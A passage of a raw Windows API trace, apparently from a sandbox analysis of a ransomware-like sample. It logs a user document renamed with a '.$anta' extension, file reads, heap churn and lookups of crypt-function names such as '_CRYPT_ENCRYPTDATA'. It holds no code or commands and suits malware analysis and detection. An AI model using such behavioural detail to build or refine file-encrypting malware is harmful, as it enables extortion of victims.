"c:\\users\\fd1hvy\\documents\\o8- 8r.odt.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0077.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0077.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0077.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0077.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0077.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0077.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.569] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0077.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0077.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0077.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0077.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0077.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0077.569] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0077.569] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0077.569] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0077.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0077.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0077.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0077.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0077.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0077.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0077.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0077.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0077.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0077.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0077.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0f020 [0077.573] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0077.573] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0077.576] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x245, lpOverlapped=0x0) returned 1 [0077.576] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0077.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0077.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0077.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0077.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10245) returned 0x48f0048 [0077.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0f020 | out: hHeap=0x1780000) returned 1 [0077.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0077.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10245) returned 0x4900298 [0077.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0077.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.584] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0077.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0077.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0077.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0077.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0077.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10245) returned 0x48f0048 [0077.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0077.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0077.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.584] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0077.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0077.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0077.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0077.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0077.585] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0077.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0077.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0077.585] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0077.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0077.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0077.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2560 [0077.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0077.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0077.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0077.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0077.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10245) returned 0x48f0048 [0077.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25a0 [0077.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0077.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0077.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2550 [0077.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0077.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0077.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2600 [0077.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0077.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0077.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca448 [0077.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0077.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0077.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0077.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0077.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10245) returned 0x49104e8 [0077.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0077.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0077.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0077.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0077.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0077.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0077.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0077.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0077.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0077.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0077.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0077.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0077.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0077.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0077.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0077.588] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0077.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0077.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0077.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0077.588] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0077.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0077.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0077.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0077.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0077.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0077.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0077.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0077.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0077.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0077.588] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0077.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0077.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0077.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2590 [0077.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0077.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0077.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0077.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0077.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0077.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0077.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0077.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0077.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0077.589] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0077.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0077.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0077.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0077.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0077.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0077.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0077.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0077.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0077.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0077.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0077.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0077.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.590] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0077.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0077.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0077.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0077.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0077.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0077.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0077.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0077.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0077.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0077.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0077.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0077.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0077.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0077.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.591] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0077.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0077.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0077.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0077.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0077.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0077.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0077.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0077.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0077.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0077.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0077.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0077.591] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0077.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0077.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0077.591] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0077.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0077.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0077.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0077.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0077.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0077.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0077.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0077.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0077.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.592] RtlAllocateHeap (HeapHandle=0x1780000, 